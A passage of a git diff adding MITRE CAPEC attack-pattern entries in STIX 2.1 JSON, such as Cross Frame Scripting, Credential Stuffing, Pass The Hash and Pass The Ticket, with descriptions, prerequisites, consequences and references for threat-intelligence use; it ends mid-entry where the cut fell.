rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json new file mode 100644 index 0000000000000000000000000000000000000000..43e25ecf4ed4347e3074823021f0db843691ace9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json @@ -0,0 +1,70 @@ +{ + "id": "bundle--41285adb-a292-45e0-bfdb-7e929a3024ef", + "objects": [ + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json new file mode 100644 index 0000000000000000000000000000000000000000..2aff9860d35f74b5ec80ca158cd504f385a912f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json @@ -0,0 +1,64 @@ +{ + "id": "bundle--f238564c-952c-45c7-8f00-ae33b3220afe", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.", + "external_references": [ + { + "external_id": "CAPEC-131", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Resource Leak Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.\n In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.\n Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json new file mode 100644 index 0000000000000000000000000000000000000000..6a2848252562e893cf359f040648ad3648bd09dd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--477a61aa-5854-4f39-8615-de9d805d92d6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json new file mode 100644 index 0000000000000000000000000000000000000000..41c277822a02e9c9482f63573a9f4bff26180ce4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json @@ -0,0 +1,153 @@ +{ + "id": "bundle--8c683b8f-6f3e-43fc-8418-1e9bce62661f", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

    2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

  2. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

    3. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

    2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json new file mode 100644 index 0000000000000000000000000000000000000000..572ab3c32a7cda2b43adf6d44b870aa43b20a49d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json @@ -0,0 +1,139 @@ +{ + "id": "bundle--b78d511d-885a-4e80-a8ca-96fc5da62e17", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

    2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

    2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json new file mode 100644 index 0000000000000000000000000000000000000000..6ebdad60ad336df8de8cc82850e5765fe3673ace --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json @@ -0,0 +1,83 @@ +{ + "id": "bundle--f830457a-ca39-47ff-8de3-2ebc4f7ea308", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json new file mode 100644 index 0000000000000000000000000000000000000000..aa953b9e769a7a40bc5a76279a8a97750f70273b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json @@ -0,0 +1,42 @@ +{ + "id": "bundle--5de8b51a-ccba-4280-8857-78a0801bea90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json new file mode 100644 index 0000000000000000000000000000000000000000..6b0da168754c29842fbb9c832e27c4930fb0c2ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--6efd529a-51c8-4c55-9e27-ced12da4ce37", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": 